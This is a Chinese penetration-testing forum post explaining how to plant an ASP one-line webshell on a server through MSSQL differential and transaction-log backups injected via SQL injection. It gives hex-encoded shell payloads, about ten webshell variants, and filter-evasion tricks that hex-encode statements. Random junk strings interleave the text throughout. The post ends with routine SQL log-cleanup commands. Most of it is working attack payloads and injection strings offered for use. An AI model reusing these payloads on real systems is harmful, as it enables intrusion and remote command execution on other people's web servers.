中国网络渗透测试联盟

标题: MSsql差异备份总结 [打印本页]

---

作者: admin    时间: 2012-9-13 17:21
标题: MSsql差异备份总结
差异备份的流程大概这样：
6 Z. M: b0 ]7 o" X. e( m* `1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--
8 f1 M) z9 a5 x; X$ r# r; J, P
2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
) B: R8 D6 R1 J* cinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.进行差异备份
; \. d1 m7 @+ Y2 pbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
2 b! V  |7 D' x6 [& p9 }
/ b2 g* U  |! {& t; R7 C1 f# e上面
" H) u( O4 M6 x: k8 T% `0x3C25657865637574652872657175657374282261222929253E
4 {8 n1 N+ ^, I# k* n2 o* D  f' g就是一句话木马的内容：<%execute(request("a"))%>
' x2 K2 t) ?2 \+ ^/ d4 Z- M
如下是网上常见的差异备份代码，思路一样！
% @. i% c# N5 l! I% U===================================================
8 I/ f# Z: n& M3 }, ^2 C利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
( Q2 D) f' \% d- `! g
create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
: U0 t: i: c/ J+ ~) d% ~  M
; Q: a7 d% o. n: b
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
3 ~3 A: ?6 a7 p8 y' V
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

drop table [xiaolu]  -- 删除此表。

" n2 E9 ~' s3 X0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
3 E& l! q7 C6 I" k8 l0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
4 d8 C1 ?4 i; z  ~: [, F. Z4 E
声明：方法不是我想的，我只是写工具，默认得到shell是
8 c. w  o) f+ h: k<%execute(request("a"))%>
===============================================================
! q" A9 m! x* v9 C0 U% ~
/ @" t$ g* i2 w- p我发现上面代码，有时会无效，而直接用

- ]) t/ X7 R- K+ L/ y) ]backup database 库名 to disk = 'c:\ddd.bak'

5 M  E7 s' s! |: T% g$ |0 Dcreate table [dbo].[dtest] ([cmd] [image]);

insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
- b$ z# {) i- Z$ `# N# _- g# \" l
8 u% F& n# i9 v+ e" \  e3 S却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
' R4 i1 @0 F; K; n! U
库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

) ?" p7 B4 g" h3 @+ e网上还有log增量备份的，我也把他记录一下
=====================================================
7 |) `# f/ q2 r% C4 T  u9 `. J另一种log增量备份技术:

';alter database null set RECOVERY FULL--
/ c- F* N8 r6 X% x; S
4 ]6 n. {  L$ x' L: ?';create table cmd (a image)--
8 ^4 {7 N7 u, N4 o2 V( f# s
';backup log null to disk = 'f:\cmd' with init--

';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

';backup log null to disk = '备份路径'--

';drop table cmd--
1 b2 T" C) B* {# a
$ Q5 m! Y/ C* r- F';alter database XXX set RECOVERY SIMPLE--

8 ?4 _3 i8 T6 q% i# NPS:0x3C2565786563757465287265717565737428226122292
4 |( U3 G6 D' M# F! l- u9253EDA 是一句话小马16进制转来的
' Z3 E0 q  R( n
说到一句话马，还可以有这么几种写法：

" J0 y8 O1 u# X3 {: Da)<%%25Execute(request("a"))%%25>
( T1 A" @" t' t' ?b)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
. r' E+ O$ \- K; [e)<%25Execute(request("a"))%25>
# u* W. e! ]/ P: }2 t  sf)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
9 c/ V/ K2 P3 ?6 PI)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

=============================================

" q. r$ ]  b0 f/ G& Q$ m当遇到差备过滤了/时用这个语句代替
" N0 K# L9 B* L2 t" l
: b% F7 g; e6 N. mdeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

8 `! s/ v1 ?0 E2 _7 c! r把要执行的语句转16进制然后用exec执行
1 D" C- `$ Y. ?5 @. i

减少备份文件大小方法如下:
2 z) i! X2 m) o7 X4 E" `
$ k  s' O  T5 b6 k8 V/ v总的来说就是那么简单几句,下面以备份数据库model为例子
3 B/ {- o/ q6 a0 Q1 C' l6 p  V1
  L* O* G% p2 hid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
8 g0 e% `2 G' _* @8 A2
id=1;backup database model to disk='你的路径‘ with differential,format;--

1 [4 _' q4 H& ]; c' g
2 m: r9 w% f+ F+ Q4 I/ m
SQL语句清理日志
/ k0 G' z5 g) [1 P9 E. y& l; N% E注：test为数据库名

--清空日志
DUMP TRANSACTION test WITH NO_LOG
! z' p* q* p- Z, a
3 E. V# j7 J! V( I--截断事务日志
BACKUP LOG test WITH NO_LOG
& ^1 \( S! M& |
4 p& a, Q* a* [  E) o/ o( G! x--收缩数据库
/ e* b8 ~8 ?3 ^. WDBCC SHRINKDATABASE(test)
1 |3 q, O& B1 `. C3 F
--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)
3 R$ j* \1 Z; x5 B$ n5 D/ x
; m+ ?1 A8 k4 J6 }! U( ^0 e* y4 C--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2